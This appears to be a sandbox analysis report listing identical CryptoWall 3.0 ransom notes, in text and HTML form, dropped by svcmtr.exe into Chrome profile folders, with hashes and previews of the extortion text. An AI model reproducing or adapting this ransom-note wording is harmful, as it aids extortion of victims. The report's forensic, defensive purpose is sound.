                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gdaefkejpgkiemlaofpalmlakkmbjdnl\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gdaefkejpgkiemlaofpalmlakkmbjdnl\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:true
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:true
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:true
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
